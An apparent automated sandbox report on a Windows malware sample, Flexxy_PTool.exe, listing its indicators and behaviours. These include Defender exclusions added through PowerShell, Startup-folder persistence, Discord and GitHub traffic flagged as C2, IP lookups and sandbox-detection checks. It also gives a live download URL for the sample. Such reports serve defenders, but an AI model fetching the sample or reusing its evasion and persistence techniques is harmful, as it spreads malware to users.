hxxps://ufile[.]io/pk7dnmlo

Resubmissions

25-05-2024 14:50

240525-r7sassgf73 8

25-05-2024 14:46

240525-r5p3nagf22 8

Analysis

max time kernel
145s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
25-05-2024 14:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://ufile.io/pk7dnmlo

Score

8^/10

execution pyinstaller upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

2328 powershell.exe
6028 powershell.exe
5108 powershell.exe
5884 powershell.exe
1320 powershell.exe
1188 powershell.exe

pid	process
2328	powershell.exe
6028	powershell.exe
5108	powershell.exe
5884	powershell.exe
1320	powershell.exe
1188	powershell.exe

Drops startup file 4 IoCs

Processes:

Flexxy_PTool.exeFlexxy_PTool.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Flexxy_PTool.exe	Flexxy_PTool.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Flexxy_PTool.exe	Flexxy_PTool.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Flexxy_PTool.exe	Flexxy_PTool.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Flexxy_PTool.exe	Flexxy_PTool.exe

Loads dropped DLL 64 IoCs

Processes:

Flexxy_PTool.exeFlexxy_PTool.exe

pid	process
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
2632	Flexxy_PTool.exe
2632	Flexxy_PTool.exe
2632	Flexxy_PTool.exe
2632	Flexxy_PTool.exe
2632	Flexxy_PTool.exe
2632	Flexxy_PTool.exe
2632	Flexxy_PTool.exe
2632	Flexxy_PTool.exe
2632	Flexxy_PTool.exe
2632	Flexxy_PTool.exe
2632	Flexxy_PTool.exe
2632	Flexxy_PTool.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI58802\python310.dll	upx
behavioral1/memory/5396-107-0x00007FFCBB020000-0x00007FFCBB48E000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\libffi-7.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\_ctypes.pyd	upx
behavioral1/memory/5396-118-0x00007FFCCCFF0000-0x00007FFCCCFFF000-memory.dmp	upx
behavioral1/memory/5396-117-0x00007FFCBBF20000-0x00007FFCBBF44000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\_bz2.pyd	upx
behavioral1/memory/5396-123-0x00007FFCBBEF0000-0x00007FFCBBF1D000-memory.dmp	upx
behavioral1/memory/5396-122-0x00007FFCCB910000-0x00007FFCCB929000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\_uuid.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\_ssl.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\_queue.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\pywin32_system32\pythoncom310.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\win32\win32api.pyd	upx
behavioral1/memory/5396-154-0x00007FFCCC740000-0x00007FFCCC74D000-memory.dmp	upx
behavioral1/memory/5396-159-0x00007FFCBBD90000-0x00007FFCBBDBB000-memory.dmp	upx
behavioral1/memory/5396-158-0x00007FFCBBDC0000-0x00007FFCBBE7C000-memory.dmp	upx
behavioral1/memory/5396-157-0x00007FFCBBE80000-0x00007FFCBBEAE000-memory.dmp	upx
behavioral1/memory/5396-156-0x00007FFCCC5E0000-0x00007FFCCC5ED000-memory.dmp	upx
behavioral1/memory/5396-155-0x00007FFCBBEB0000-0x00007FFCBBEE4000-memory.dmp	upx
behavioral1/memory/5396-153-0x00007FFCCB720000-0x00007FFCCB739000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\_cffi_backend.cp310-win_amd64.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\pywin32_system32\pywintypes310.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\pyexpat.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\_overlapped.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\_multiprocessing.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\_decimal.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\_asyncio.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\unicodedata.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\libssl-1_1.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\libcrypto-1_1.dll	upx
behavioral1/memory/5396-163-0x00007FFCBAF60000-0x00007FFCBB018000-memory.dmp	upx
behavioral1/memory/5396-162-0x00007FFCBBD60000-0x00007FFCBBD8E000-memory.dmp	upx
behavioral1/memory/5396-166-0x00007FFCBA090000-0x00007FFCBA405000-memory.dmp	upx
behavioral1/memory/5396-171-0x00007FFCCC300000-0x00007FFCCC310000-memory.dmp	upx
behavioral1/memory/5396-170-0x00007FFCBBD40000-0x00007FFCBBD55000-memory.dmp	upx
behavioral1/memory/5396-176-0x00007FFCB9F10000-0x00007FFCBA081000-memory.dmp	upx
behavioral1/memory/5396-175-0x00007FFCBBD20000-0x00007FFCBBD3F000-memory.dmp	upx
behavioral1/memory/5396-174-0x00007FFCBB020000-0x00007FFCBB48E000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\psutil\_psutil_windows.pyd	upx
behavioral1/memory/5396-179-0x00007FFCBBD00000-0x00007FFCBBD18000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\zstandard\backend_c.cp310-win_amd64.pyd	upx
behavioral1/memory/5396-182-0x00007FFCBAED0000-0x00007FFCBAF57000-memory.dmp	upx
behavioral1/memory/5396-184-0x00007FFCBBA60000-0x00007FFCBBA74000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\charset_normalizer\md.cp310-win_amd64.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI58802\charset_normalizer\md__mypyc.cp310-win_amd64.pyd	upx
behavioral1/memory/5396-190-0x00007FFCCC220000-0x00007FFCCC22B000-memory.dmp	upx
behavioral1/memory/5396-195-0x00007FFCB9DC0000-0x00007FFCB9ED8000-memory.dmp	upx
behavioral1/memory/5396-194-0x00007FFCBAF60000-0x00007FFCBB018000-memory.dmp	upx
behavioral1/memory/5396-193-0x00007FFCBBD60000-0x00007FFCBBD8E000-memory.dmp	upx
behavioral1/memory/5396-192-0x00007FFCB9EE0000-0x00007FFCB9F06000-memory.dmp	upx
behavioral1/memory/5396-200-0x00007FFCCBC80000-0x00007FFCCBC8B000-memory.dmp	upx
behavioral1/memory/5396-199-0x00007FFCB9D80000-0x00007FFCB9DB8000-memory.dmp	upx
behavioral1/memory/5396-206-0x00007FFCBAEC0000-0x00007FFCBAECB000-memory.dmp	upx
behavioral1/memory/5396-205-0x00007FFCBBA50000-0x00007FFCBBA5C000-memory.dmp	upx
behavioral1/memory/5396-204-0x00007FFCBD2C0000-0x00007FFCBD2CB000-memory.dmp	upx
behavioral1/memory/5396-203-0x00007FFCBD6E0000-0x00007FFCBD6EC000-memory.dmp	upx
behavioral1/memory/5396-202-0x00007FFCCB960000-0x00007FFCCB96B000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

Processes:

flow	ioc
233	discord.com
234	discord.com
198	raw.githubusercontent.com
199	raw.githubusercontent.com
229	raw.githubusercontent.com
211	discord.com
231	discord.com
205	discord.com
207	discord.com
210	discord.com

Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

196 api.ipify.org
197 api.ipify.org
209 api.ipify.org
227 api.ipify.org
228 api.ipify.org
232 api.ipify.org

flow	ioc
196	api.ipify.org
197	api.ipify.org
209	api.ipify.org
227	api.ipify.org
228	api.ipify.org
232	api.ipify.org

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Flexxy_PTool.exe	pyinstaller

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exeWMIC.exe

pid process

5452 WMIC.exe
3372 WMIC.exe

pid	process
5452	WMIC.exe
3372	WMIC.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{BF2B78E5-11BC-44D4-91F4-8D96925D1FEF}	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Flexxy_PTool.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskmgr.exe

pid	process
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
5396	Flexxy_PTool.exe
4124	powershell.exe
4124	powershell.exe
4124	powershell.exe
5664	powershell.exe
5664	powershell.exe
5664	powershell.exe
2328	powershell.exe
2328	powershell.exe
2328	powershell.exe
6028	powershell.exe
6028	powershell.exe
6028	powershell.exe
1320	powershell.exe
1320	powershell.exe
1320	powershell.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Flexxy_PTool.exeWMIC.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	5396	Flexxy_PTool.exe
Token: SeIncreaseQuotaPrivilege	6024	WMIC.exe
Token: SeSecurityPrivilege	6024	WMIC.exe
Token: SeTakeOwnershipPrivilege	6024	WMIC.exe
Token: SeLoadDriverPrivilege	6024	WMIC.exe
Token: SeSystemProfilePrivilege	6024	WMIC.exe
Token: SeSystemtimePrivilege	6024	WMIC.exe
Token: SeProfSingleProcessPrivilege	6024	WMIC.exe
Token: SeIncBasePriorityPrivilege	6024	WMIC.exe
Token: SeCreatePagefilePrivilege	6024	WMIC.exe
Token: SeBackupPrivilege	6024	WMIC.exe
Token: SeRestorePrivilege	6024	WMIC.exe
Token: SeShutdownPrivilege	6024	WMIC.exe
Token: SeDebugPrivilege	6024	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6024	WMIC.exe
Token: SeRemoteShutdownPrivilege	6024	WMIC.exe
Token: SeUndockPrivilege	6024	WMIC.exe
Token: SeManageVolumePrivilege	6024	WMIC.exe
Token: 33	6024	WMIC.exe
Token: 34	6024	WMIC.exe
Token: 35	6024	WMIC.exe
Token: 36	6024	WMIC.exe
Token: SeIncreaseQuotaPrivilege	6024	WMIC.exe
Token: SeSecurityPrivilege	6024	WMIC.exe
Token: SeTakeOwnershipPrivilege	6024	WMIC.exe
Token: SeLoadDriverPrivilege	6024	WMIC.exe
Token: SeSystemProfilePrivilege	6024	WMIC.exe
Token: SeSystemtimePrivilege	6024	WMIC.exe
Token: SeProfSingleProcessPrivilege	6024	WMIC.exe
Token: SeIncBasePriorityPrivilege	6024	WMIC.exe
Token: SeCreatePagefilePrivilege	6024	WMIC.exe
Token: SeBackupPrivilege	6024	WMIC.exe
Token: SeRestorePrivilege	6024	WMIC.exe
Token: SeShutdownPrivilege	6024	WMIC.exe
Token: SeDebugPrivilege	6024	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6024	WMIC.exe
Token: SeRemoteShutdownPrivilege	6024	WMIC.exe
Token: SeUndockPrivilege	6024	WMIC.exe
Token: SeManageVolumePrivilege	6024	WMIC.exe
Token: 33	6024	WMIC.exe
Token: 34	6024	WMIC.exe
Token: 35	6024	WMIC.exe
Token: 36	6024	WMIC.exe
Token: SeDebugPrivilege	4124	powershell.exe
Token: SeDebugPrivilege	5664	powershell.exe
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	6028	powershell.exe
Token: SeDebugPrivilege	1320	powershell.exe
Token: SeIncreaseQuotaPrivilege	3360	WMIC.exe
Token: SeSecurityPrivilege	3360	WMIC.exe
Token: SeTakeOwnershipPrivilege	3360	WMIC.exe
Token: SeLoadDriverPrivilege	3360	WMIC.exe
Token: SeSystemProfilePrivilege	3360	WMIC.exe
Token: SeSystemtimePrivilege	3360	WMIC.exe
Token: SeProfSingleProcessPrivilege	3360	WMIC.exe
Token: SeIncBasePriorityPrivilege	3360	WMIC.exe
Token: SeCreatePagefilePrivilege	3360	WMIC.exe
Token: SeBackupPrivilege	3360	WMIC.exe
Token: SeRestorePrivilege	3360	WMIC.exe
Token: SeShutdownPrivilege	3360	WMIC.exe
Token: SeDebugPrivilege	3360	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3360	WMIC.exe
Token: SeRemoteShutdownPrivilege	3360	WMIC.exe
Token: SeUndockPrivilege	3360	WMIC.exe

Suspicious use of FindShellTrayWindow 45 IoCs

Processes:

7zG.exetaskmgr.exe

pid	process
5812	7zG.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe

Suspicious use of SendNotifyMessage 44 IoCs

Processes:

taskmgr.exe

pid	process
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe
5780	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Flexxy_PTool.exeFlexxy_PTool.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exeFlexxy_PTool.exeFlexxy_PTool.exeFlexxy_PTool.exeFlexxy_PTool.execmd.execmd.execmd.exe

description	pid	process	target process
PID 5880 wrote to memory of 5396	5880	Flexxy_PTool.exe	Flexxy_PTool.exe
PID 5880 wrote to memory of 5396	5880	Flexxy_PTool.exe	Flexxy_PTool.exe
PID 5396 wrote to memory of 5508	5396	Flexxy_PTool.exe	cmd.exe
PID 5396 wrote to memory of 5508	5396	Flexxy_PTool.exe	cmd.exe
PID 5396 wrote to memory of 5960	5396	Flexxy_PTool.exe	cmd.exe
PID 5396 wrote to memory of 5960	5396	Flexxy_PTool.exe	cmd.exe
PID 5960 wrote to memory of 6024	5960	cmd.exe	WMIC.exe
PID 5960 wrote to memory of 6024	5960	cmd.exe	WMIC.exe
PID 5396 wrote to memory of 6084	5396	Flexxy_PTool.exe	cmd.exe
PID 5396 wrote to memory of 6084	5396	Flexxy_PTool.exe	cmd.exe
PID 6084 wrote to memory of 5196	6084	cmd.exe	netsh.exe
PID 6084 wrote to memory of 5196	6084	cmd.exe	netsh.exe
PID 5396 wrote to memory of 3012	5396	Flexxy_PTool.exe	cmd.exe
PID 5396 wrote to memory of 3012	5396	Flexxy_PTool.exe	cmd.exe
PID 3012 wrote to memory of 4124	3012	cmd.exe	powershell.exe
PID 3012 wrote to memory of 4124	3012	cmd.exe	powershell.exe
PID 5396 wrote to memory of 5648	5396	Flexxy_PTool.exe	cmd.exe
PID 5396 wrote to memory of 5648	5396	Flexxy_PTool.exe	cmd.exe
PID 5648 wrote to memory of 5664	5648	cmd.exe	powershell.exe
PID 5648 wrote to memory of 5664	5648	cmd.exe	powershell.exe
PID 5648 wrote to memory of 2328	5648	cmd.exe	powershell.exe
PID 5648 wrote to memory of 2328	5648	cmd.exe	powershell.exe
PID 5648 wrote to memory of 6028	5648	cmd.exe	powershell.exe
PID 5648 wrote to memory of 6028	5648	cmd.exe	powershell.exe
PID 5648 wrote to memory of 1320	5648	cmd.exe	powershell.exe
PID 5648 wrote to memory of 1320	5648	cmd.exe	powershell.exe
PID 5396 wrote to memory of 4136	5396	Flexxy_PTool.exe	cmd.exe
PID 5396 wrote to memory of 4136	5396	Flexxy_PTool.exe	cmd.exe
PID 4136 wrote to memory of 3360	4136	cmd.exe	WMIC.exe
PID 4136 wrote to memory of 3360	4136	cmd.exe	WMIC.exe
PID 5396 wrote to memory of 116	5396	Flexxy_PTool.exe	wmic.exe
PID 5396 wrote to memory of 116	5396	Flexxy_PTool.exe	wmic.exe
PID 5396 wrote to memory of 4872	5396	Flexxy_PTool.exe	cmd.exe
PID 5396 wrote to memory of 4872	5396	Flexxy_PTool.exe	cmd.exe
PID 4872 wrote to memory of 3372	4872	cmd.exe	WMIC.exe
PID 4872 wrote to memory of 3372	4872	cmd.exe	WMIC.exe
PID 5396 wrote to memory of 5252	5396	Flexxy_PTool.exe	cmd.exe
PID 5396 wrote to memory of 5252	5396	Flexxy_PTool.exe	cmd.exe
PID 5252 wrote to memory of 1372	5252	cmd.exe	WMIC.exe
PID 5252 wrote to memory of 1372	5252	cmd.exe	WMIC.exe
PID 5396 wrote to memory of 4724	5396	Flexxy_PTool.exe	cmd.exe
PID 5396 wrote to memory of 4724	5396	Flexxy_PTool.exe	cmd.exe
PID 4724 wrote to memory of 2028	4724	cmd.exe	WMIC.exe
PID 4724 wrote to memory of 2028	4724	cmd.exe	WMIC.exe
PID 3400 wrote to memory of 2632	3400	Flexxy_PTool.exe	Flexxy_PTool.exe
PID 3400 wrote to memory of 2632	3400	Flexxy_PTool.exe	Flexxy_PTool.exe
PID 2632 wrote to memory of 4776	2632	Flexxy_PTool.exe	cmd.exe
PID 2632 wrote to memory of 4776	2632	Flexxy_PTool.exe	cmd.exe
PID 5620 wrote to memory of 5840	5620	Flexxy_PTool.exe	Flexxy_PTool.exe
PID 5620 wrote to memory of 5840	5620	Flexxy_PTool.exe	Flexxy_PTool.exe
PID 5840 wrote to memory of 4420	5840	Flexxy_PTool.exe	cmd.exe
PID 5840 wrote to memory of 4420	5840	Flexxy_PTool.exe	cmd.exe
PID 5840 wrote to memory of 5220	5840	Flexxy_PTool.exe	cmd.exe
PID 5840 wrote to memory of 5220	5840	Flexxy_PTool.exe	cmd.exe
PID 5220 wrote to memory of 1152	5220	cmd.exe	WMIC.exe
PID 5220 wrote to memory of 1152	5220	cmd.exe	WMIC.exe
PID 5840 wrote to memory of 2796	5840	Flexxy_PTool.exe	cmd.exe
PID 5840 wrote to memory of 2796	5840	Flexxy_PTool.exe	cmd.exe
PID 5840 wrote to memory of 2632	5840	Flexxy_PTool.exe	cmd.exe
PID 5840 wrote to memory of 2632	5840	Flexxy_PTool.exe	cmd.exe
PID 2796 wrote to memory of 3372	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 3372	2796	cmd.exe	netsh.exe
PID 2632 wrote to memory of 2304	2632	cmd.exe	powershell.exe
PID 2632 wrote to memory of 2304	2632	cmd.exe	powershell.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ufile.io/pk7dnmlo
1⤵
PID:2868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4268,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=3980 /prefetch:1
1⤵
PID:772

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4888,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=4048 /prefetch:1
1⤵
PID:1228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=5240,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5272 /prefetch:1
1⤵
PID:1984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5420,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:8
1⤵
PID:3644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5452,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5460 /prefetch:8
1⤵
PID:2440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5956,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5760 /prefetch:8
1⤵
PID:4548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6256,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6236 /prefetch:8
1⤵
PID:640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6348,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6304 /prefetch:8
1⤵
- Modifies registry class
PID:4704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --field-trial-handle=5920,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6068 /prefetch:1
1⤵
PID:4324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --field-trial-handle=6456,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:1
1⤵
PID:3988

